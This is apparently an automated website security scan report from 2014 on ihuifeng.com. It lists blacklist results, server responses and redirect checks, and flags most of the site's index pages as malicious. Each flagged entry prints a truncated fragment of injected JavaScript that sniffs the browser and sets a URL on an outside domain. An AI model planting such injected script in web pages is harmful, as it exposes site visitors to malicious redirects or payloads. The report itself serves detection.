Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ihuifeng.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ihuifeng.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ihuifeng.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 23 Apr 2014 06:37:12 GMT Location: index.html Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.9-2 | clean |
http://www.ihuifeng.com/index.html | 200 OK Content-Length: 32841 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.fy18.c Antivirus reports:
| ||
http://www.01marry.cn/link.js | 200 OK Content-Length: 517 Content-Type: application/x-javascript | clean |
http://www.ihuifeng.com/js/jquery-1.4.2.min.js | 200 OK Content-Length: 41129 Content-Type: application/x-javascript | clean |
http://www.ihuifeng.com/Portfolio | HTTP/1.1 301 Moved Permanently Date: Wed, 23 Apr 2014 06:37:23 GMT Location: http://www.ihuifeng.com/Portfolio/ Server: Microsoft-IIS/6.0 Content-Length: 157 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:23 GMT Accept-Ranges: bytes ETag: "dcccec8034c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 11597 Content-Location: http://www.ihuifeng.com/portfolio/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:10 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/index.html | 200 OK Content-Length: 11597 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.2dedec Antivirus reports:
| ||
http://www.ihuifeng.com/portfolio | HTTP/1.1 301 Moved Permanently Date: Wed, 23 Apr 2014 06:37:29 GMT Location: http://www.ihuifeng.com/portfolio/ Server: Microsoft-IIS/6.0 Content-Length: 157 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.ihuifeng.com/services | HTTP/1.1 301 Moved Permanently Date: Wed, 23 Apr 2014 06:37:31 GMT Location: http://www.ihuifeng.com/services/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/services/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:31 GMT Accept-Ranges: bytes ETag: "10e9508134c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 6907 Content-Location: http://www.ihuifeng.com/services/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:11 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/services/index.html | 200 OK Content-Length: 6907 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.fy18.c Antivirus reports:
| ||
http://www.ihuifeng.com/about | HTTP/1.1 301 Moved Permanently Date: Wed, 23 Apr 2014 06:37:35 GMT Location: http://www.ihuifeng.com/about/ Server: Microsoft-IIS/6.0 Content-Length: 153 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/about/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:35 GMT Accept-Ranges: bytes ETag: "552658a29145cf1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 9257 Content-Location: http://www.ihuifeng.com/about/index.html Content-Type: text/html Last-Modified: Sat, 22 Mar 2014 05:43:21 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/about/index.html | 200 OK Content-Length: 9257 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.fy18.c Antivirus reports:
| ||
http://www.ihuifeng.com/contact | HTTP/1.1 301 Moved Permanently Date: Wed, 23 Apr 2014 06:37:40 GMT Location: http://www.ihuifeng.com/contact/ Server: Microsoft-IIS/6.0 Content-Length: 155 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/contact/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:40 GMT Accept-Ranges: bytes ETag: "f439ee8134c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 8319 Content-Location: http://www.ihuifeng.com/contact/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:12 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/contact/index.html | 200 OK Content-Length: 8319 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.fy18.c Antivirus reports:
| ||
http://www.ihuifeng.com/js/global.js | 200 OK Content-Length: 130 Content-Type: application/x-javascript | clean |
http://www.ihuifeng.com/tencent://message/?uin=2486007357&Site=»Ô·æ¹â»ú¹¤×÷ÊÒ&Menu=yes | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.ihuifeng.com/msnim:chat?contact=vikkihuang2008@hotmail.com | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.ihuifeng.com/Portfolio/chengxiangsheji/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:49 GMT Accept-Ranges: bytes ETag: "74c6868234c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 11574 Content-Location: http://www.ihuifeng.com/Portfolio/chengxiangsheji/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:13 GMT X-Died: timeout at scan.pm line 1538. X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/chengxiangsheji/index.html | 200 OK Content-Length: 11574 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.2dedec Antivirus reports:
| ||
http://www.ihuifeng.com/Portfolio/zhaomingdengju/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:37:56 GMT Accept-Ranges: bytes ETag: "441ee68234c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 7762 Content-Location: http://www.ihuifeng.com/Portfolio/zhaomingdengju/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:14 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/zhaomingdengju/index.html | 200 OK Content-Length: 7762 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.2dedec Antivirus reports:
| ||
http://www.ihuifeng.com/Portfolio/guangjijiegou/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:38:00 GMT Accept-Ranges: bytes ETag: "12c1ce8434c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 9118 Content-Location: http://www.ihuifeng.com/Portfolio/guangjijiegou/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:17 GMT X-Died: timeout at scan.pm line 1538. X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/guangjijiegou/index.html | 200 OK Content-Length: 9118 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.2dedec Antivirus reports:
| ||
http://www.ihuifeng.com/Portfolio/youxianyuanfenxi/ | HTTP/1.1 200 OK Date: Wed, 23 Apr 2014 06:38:07 GMT Accept-Ranges: bytes ETag: "96f2268534c3ce1:23fed" Server: Microsoft-IIS/6.0 Content-Length: 7276 Content-Location: http://www.ihuifeng.com/Portfolio/youxianyuanfenxi/index.html Content-Type: text/html Last-Modified: Mon, 07 Oct 2013 08:09:17 GMT X-Powered-By: ASP.NET | clean |
http://www.ihuifeng.com/portfolio/youxianyuanfenxi/index.html | 200 OK Content-Length: 7276 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var browser = new Object(); function getBrowser() { var b = navigator.userAgent.toLowerCase(); browser = { safari: /webkit/.test(b), opera: /opera/.test(b), ie6: /msie 6/.test(b) && !/opera/.test(b), ie7: /msie 7/.test(b) && !/opera/.test(b), msie: /msie/.test(b) && !/opera/.test(b), mozilla: /mozilla/.test(b) && !/(compatible|webkit)/.test(b) }; } getBrowser() ; var urlVar = "http://www.2dedec Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ihuifeng.com
Result:
GET / HTTP/1.1
Host: ihuifeng.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ihuifeng.com
Referer: http://www.google.com/search?q=ihuifeng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ihuifeng.com
Referer: http://www.google.com/search?q=ihuifeng.com
Result:
The result is similar to the first query. There are no suspicious redirects found.